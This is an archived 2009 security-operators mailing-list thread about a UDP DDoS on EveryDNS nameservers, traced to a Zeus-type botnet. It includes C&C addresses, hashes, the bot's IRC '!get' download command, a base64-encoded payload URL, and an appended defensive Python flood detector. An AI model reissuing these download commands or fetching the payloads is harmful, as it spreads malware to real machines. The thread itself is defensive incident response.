[nsp-sec] DDoS to EveryDNS nameserver IPs

Stephen Gill gillsr at cymru.com
Wed Feb 4 20:53:04 EST 2009


Alas the attachment was stripped.  Let's try that again:

https://www.cymru.com/nsp-sec/Owned/bigmap2.pdf

Please do NOT share outside of nsp-sec w/o permission.

Cheers,
-- steve

On 2/4/09 6:47 PM, "Stephen Gill" <gillsr at cymru.com> wrote:

> ----------- nsp-security Confidential --------
> 
> Indeed, it seems there's quite a bit behind that IP, mostly Web based
> botnets of the Zeus flavor.
> 
> I've attached a quick 1/2 level deep PDF snapshot of the IPs - hopefully
> puck will cooperate.  If it doesn't I'll post a private URL.  If interested
> we can pull out all the nodes for easier parsing.  It's quite an elaborate
> network, and it gets really interesting if you go 1-2 more levels down.
> 
> Graph compressed on whitespace to make it easier for smaller screens.
> 
> Enjoy!
> 
> Cheers,
> -- steve
> 
> On 2/4/09 6:12 PM, "White, Gerard" <Gerard.White at aliant.ca> wrote:
> 
>> Ladies:
>> 
>> irc.zief.pl on TCP/80
>> 
>> JOIN #.364
>> PRIVMSG :!get hxxp://horobl.cn/ex/a.php
>> 
>> Name:    horobl.cn
>> Address:  211.95.79.6  (Note Typo from Below???)
>> 
>> HTTP/1.1 200 OK
>> Server:  nginx
>> 
>> MD5:  dc9f67ae1d175386625c97fcf22c77ab
>> 11776 Bytes:
>> http://www.virustotal.com/analisis/34c33485e6a0f326bf75b15cd2ae404c
>> 
>> 
>> Which then triggers:
>> GET hxxp://mega/lgate.php?n=<ID>
>> 
>> With a response of:
>> HTTP/1.1 200 OK
>> Server: nginx
>> 
>> Content-Length: 44
>> MCBodHRwOi8vc2V0ZG9jLmNuL2Rsay9jYWUuZXhlIDE=
>> 
>> 
>> Which decodes to:
>> GET hxxp://setdoc.cn/dlk/cae.exe
>> 
>> With a response of:
>> HTTP/1.1 200 OK
>> Date: Thu, 05 Feb 2009 08:39:36 GMT
>> Server: Apache/2.2.3 (CentOS)
>> Last-Modified: Tue, 03 Feb 2009 17:54:41 GMT
>> ETag: "154000f-1ae00-5d923a40"
>> Accept-Ranges: bytes
>> Content-Length: 110080
>> Connection: close
>> Content-Type: application/octet-stream
>> 
>> MD5: deac9c705ed0f4e4c1d0f3c5bb9aa9c1
>> http://www.virustotal.com/analisis/2cc2c169bfea6ee56d3298fc853d2355
>> 
>> Uses RSA crypto... drops a file "bogoa.exe"
>> 
>> MD5: 0c524d62abc45d466bd812b091b5d7b0
>> http://www.virustotal.com/analisis/a9ae781773cba091485e3863c40c1ab4
>> 
>> 
>> GW
>> 855 - Bell Aliant
>> 
>> 
>> -----Original Message-----
>> From: nsp-security-bounces at puck.nether.net
>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
>> Sent: Wednesday, February 04, 2009 7:49 PM
>> To: David Ulevitch; nsp-security at puck.nether.net
>> Subject: Re: [nsp-sec] DDoS to EveryDNS nameserver IPs
>> 
>> ----------- nsp-security Confidential --------
>> 
>> Supposedly these are the likely C&C candidates after a very helpful
>> individual took a brief glance at an infected machine:
>> 
>> 9800    | 211.95.76.6      | UNICOM CHINA UNICOM
>> 23898   | 58.65.232.34     | HOSTFRESH-AS-AP HostFresh Internet
>> 
>> I've fired up the malware on our Sandbox to see if it matches up.  There are
>> quite a few varieties of this file and almost 0 AV pick it up.
>> 
>> You can also google for the most recent sample:
>> 
>> SHA1 a5396141cab8b22d9d88b28a814089537dce366a
>> MD5 01c3346c241652f43aed8e2149881bfe
>> 
>> Lawrence should have a seccheck now.
>> 
>> PID     1252   204.184.73.43:1168   58.65.232.34:80   ESTABLISHED
>> winlogon.exe   \??\C:\WINDOWS\SYSTEM32\winlogon.exe
>> 
>> PID     1252   204.184.73.43:1175   211.95.79.6:80   ESTABLISHED
>> winlogon.exe   \??\C:\WINDOWS\SYSTEM32\winlogon.exe
>> 
>> -- steve
>> 
>> 
>> On 2/4/09 11:39 AM, "David Ulevitch" <david at opendns.com> wrote:
>> 
>>> ----------- nsp-security Confidential --------
>>> 
>>> I'm currently receiving a large DDoS to all my EveryDNS nameserver IPs:
>>> 
>>> ns1.everydns.net has address 208.76.56.56
>>> ns2.everydns.net has address 78.129.207.168
>>> ns3.everydns.net has address 71.6.202.220
>>> ns4.everydns.net has address 208.96.6.134
>>> 
>>> The DDoS appears to all be UDP packets of length 1000 bytes.
>>> 
>>> Here's what I mean:
>>> 
>>> 01:39:20.107917 IP 115.186.96.138.58798 > 208.76.56.56.2194: UDP, length 1000
>>> 01:39:20.107959 IP 82.212.143.159.2270 > 208.76.56.56.4000: UDP, length 1000
>>> 01:39:20.107969 IP 187.10.195.160.60001 > 208.76.56.56.2105: UDP, length 1000
>>> 01:39:20.107986 IP 189.119.47.137.25664 > 208.76.56.56.908: UDP, length 1000
>>> 01:39:20.107991 IP 213.189.175.47.3732 > 208.76.56.56.3804: UDP, length 1000
>>> 01:39:20.108012 IP 202.41.85.244.22349 > 208.76.56.56.3119: UDP, length 1000
>>> 01:39:20.108089 IP 89.174.93.234.4675 > 208.76.56.56.3589: UDP, length 1000
>>> 
>>> Anyone know what this looks like or anything I can do to stop it...
>>> 
>>> 3 of the 4 nameservers are offline right now, and I'm working with
>>> some folks to bring up some more machines now.  Ironically, I'm at the
>>> ICANN DNS meeting at GATech right now with a bunch of you. :-)
>>> 
>>> Thanks,
>>> David Ulevitch
>>> 415 971 6916
>>> 
>>> 
>>> _______________________________________________
>>> nsp-security mailing list
>>> nsp-security at puck.nether.net
>>> https://puck.nether.net/mailman/listinfo/nsp-security
>>> 
>>> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
>>> community. Confidentiality is essential for effective Internet security
>>> counter-measures.
>>> _______________________________________________

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
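Added example, not part of the thread: a small Python detector that parses tcpdump lines of the kind David quoted and summarises, per destination, how many fixed-length UDP packets arrived, from how many distinct sources, and on how many distinct destination ports. The sample input is the seven lines quoted above plus one constructed benign DNS query (192.0.2.10 is a documentation address); the regex and threshold are assumptions for illustration.

```python
import re
from collections import defaultdict

# Sample input: the seven tcpdump lines quoted in the thread plus one
# constructed benign DNS query (192.0.2.10 is a documentation address).
SAMPLE_LINES = """\
01:39:20.107917 IP 115.186.96.138.58798 > 208.76.56.56.2194: UDP, length 1000
01:39:20.107959 IP 82.212.143.159.2270 > 208.76.56.56.4000: UDP, length 1000
01:39:20.107969 IP 187.10.195.160.60001 > 208.76.56.56.2105: UDP, length 1000
01:39:20.107986 IP 189.119.47.137.25664 > 208.76.56.56.908: UDP, length 1000
01:39:20.107991 IP 213.189.175.47.3732 > 208.76.56.56.3804: UDP, length 1000
01:39:20.108012 IP 202.41.85.244.22349 > 208.76.56.56.3119: UDP, length 1000
01:39:20.108089 IP 89.174.93.234.4675 > 208.76.56.56.3589: UDP, length 1000
01:39:20.108100 IP 192.0.2.10.51234 > 208.76.56.56.53: UDP, length 41
"""

# One tcpdump UDP summary line: "<ts> IP <src>.<sport> > <dst>.<dport>: UDP, length <n>"
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): UDP, length (?P<len>\d+)$"
)

def parse_udp_lines(text):
    """Return one dict per UDP line tcpdump printed; other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            records.append({"ts": d["ts"], "src": d["src"], "sport": int(d["sport"]),
                            "dst": d["dst"], "dport": int(d["dport"]), "len": int(d["len"])})
    return records

def flood_summary(records, length, min_sources=5):
    """Per destination, count packets of exactly `length` bytes, the distinct
    sources sending them and the distinct destination ports hit: one target,
    one fixed size, many senders, many ports is the pattern in the thread.
    Destinations with fewer than `min_sources` senders are dropped as noise;
    non_dns_ports counts the ports a "UDP/53 only to this host" filter would cut."""
    per_dst = defaultdict(lambda: {"packets": 0, "sources": set(), "dports": set()})
    for r in records:
        if r["len"] != length:
            continue
        s = per_dst[r["dst"]]
        s["packets"] += 1
        s["sources"].add(r["src"])
        s["dports"].add(r["dport"])
    return {dst: {"packets": s["packets"], "sources": len(s["sources"]),
                  "dports": len(s["dports"]), "non_dns_ports": len(s["dports"] - {53})}
            for dst, s in per_dst.items() if len(s["sources"]) >= min_sources}
```

Run `flood_summary(parse_udp_lines(SAMPLE_LINES), 1000)` to see the single flooded nameserver reported; the benign 41-byte query to port 53 does not count.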